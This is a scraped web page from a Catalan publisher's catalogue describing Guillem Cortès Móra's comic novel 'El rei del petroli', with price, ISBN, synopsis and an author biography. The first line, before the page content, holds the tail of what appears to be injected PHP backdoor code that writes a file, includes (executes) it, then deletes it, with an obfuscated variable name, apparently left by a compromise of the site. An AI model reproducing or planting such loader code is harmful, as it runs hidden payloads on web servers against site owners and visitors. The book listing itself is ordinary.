");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Edicions Documenta Balear - El rei del petroli
Cercador d'Obres
ORDENAR:
Començar recerca

El rei del petroli

Cortès Móra, Guillem

E-book
Col·lecció:
Magatzem Can Toni
Tema:
Creació
Pàgines:
218
PVP:
18.00
PVP E-book:
9.00
ISBN:
978-84-15432-45-6
Data d'Edició:
01/04/2013
Comprar
La desaparició d’un home molt ric que ha tornat d’Amèrica i viu envoltat de dones... i la benzinera es converteix en l’agència d’investigació.
Sinopsi
Un estiu de feina d’un estudiant en una benzinera és la mar de corrent. Allò que ja no és tan corrent és el que succeeix en aquest estiu a la benzinera de Don Valentí. D’una situació còmica passes a una altra sempre seguit. Riuràs més o menys, però tens assegurada la diversió.
 
Els clients habituals de l’estació de servei, així com els companys de feina d’en Lluís, que és l’estudiant, són uns quants dels al·licients còmics de l’obra, que gira al voltant de la desaparició de Don August, un home molt ric que ha tornat d’Amèrica i viu envoltat de dones. La benzinera, que passa un mal moment econòmic, es converteix en l’agència d’investigació per a recuperar-lo a canvi d’una bona comissió. El rei del petroli és humor pur i dur. La gràcia expressiva de l’obra, els personatges excèntrics i les situacions insòlites et garanteixen una lectura impagable.
Guillem Cortès Móra
(Sóller, 1959) és llicenciat en dret per la Universitat de les Illes Balears i secretari interventor d’Administració local.
La seva primera novel·la fou Escolta el batec de la justícia (2007), guanyadora del vii premi Alexandre Ballester de narrativa. També ha publicat el llibre de relats Contes sense fronteres (2009).

Recomanar
Comentar
Comentaris (0)